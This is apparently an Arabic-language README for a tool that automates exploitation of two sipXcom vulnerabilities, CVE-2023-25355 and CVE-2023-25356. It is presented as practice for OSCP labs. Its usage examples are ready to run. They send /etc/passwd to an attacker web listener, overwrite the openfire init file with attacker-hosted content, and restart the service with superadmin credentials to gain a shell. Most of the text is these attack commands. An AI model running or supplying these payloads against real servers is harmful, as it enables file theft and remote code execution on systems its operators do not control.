
CVE-2023-25355 و CVE-2023-25356 مع إعادة تحميل الخدمة تلقائيًا
تم العثور على الاستغلال بواسطة [email protected] ويتم تقديمه في قطعتين رائعتين:
تم نشر مستودع لأتمتة هذه الثغرة بشكل أكبر بواسطة Alex Linov:
CVE-2023-25355 هي آلية تسريب حيث يتم رفع الملفات الموجودة على خادم sipXcom إلى خادم ويب يتحكم به المهاجم.
CVE-2023-25356 هي امتداد للثغرة الأولى حيث يمكن كتابة الملفات التي يتحكم بها المهاجم على نظام ملفات خادم sipXcom. نظرًا لأن خدمة sipXcom قادرة على استبدال تكوين init الخاص بها، يمكن الحصول على شيل بسهولة بمجرد إعادة تشغيل الخدمة.
النقطة المثيرة للاهتمام هنا هي أن مستخدم superadmin في sipXcom قادر على إعادة تشغيل هذه الخدمة. لذلك فإن الهدف من هذه الحزمة هو أتمتة إعادة تشغيل هذه الخدمة بالكامل.
للاستعداد لـ OSCP، هناك مختبرات تحتوي على أجهزة لاختراقها.
في مختبر معين، كانت إحدى الأجهزة المتأثرة بهذه الثغرة غير مستقرة، مما يعني أنك كانت تضطر أحيانًا لبدء المختبر وإعادته عدة مرات. هذا مزعج. بمجرد أتمتته، يصبح أقل إزعاجًا.
تحتاج إلى:
poetry install
ثم يمكنك تشغيل الأداة إما من البيئة المفعلة، أو من الدليل، أو من مكان آخر باستخدام اسم CVE:
# if the poetry environment is active (poetry shell)
cve_2023_25355 --help
# otherwise, from the current directory
poetry run cve_2023_25355 --help
# otherwise from another directory
poetry -C /shared/tools/CVE/CVE-2023-25355 run cve_2023_25355 --help
في المثال التالي، نرسل حمولة لتسريب ملف /etc/passwd والذي سيتم رفعه إلى مستقبل HTTP يتحكم به.
cve_2023_25355 \
--xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
--xmpp-server-address 1.2.3.4 \
--payload '--data-binary @/etc/passwd http://ATTACKER-WEB-LISTENER/some_path'
في المثال التالي، نرسل حمولة لاستبدال ملف /etc/init.d/openfire بمحتوى URI المقدم.
cve_2023_25356 \
--xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
--xmpp-server-address 1.2.3.4 \
--sipxcom-init-file-source-uri 'http://ATTACKER-WEB-LISTENER/my-offensive-sipx-config'
ثم، إذا عرفنا كلمة مرور superadmin، يمكننا إعادة تشغيل الخدمة لإعادة تحميل التكوين وتشغيل أي أداة.
run sipxcom_service_restart \
--sipxcom-superuser-username superadmin \
--sipxcom-superuser-password superadmin_password \
--sipxcom-website https://1.2.3.4/
--debug-local-directory /tmp
./proxychains4 -f proxychains.conf cve_2023_25355 [...] --xmpp-server-address 172.1.2.3
المشروع: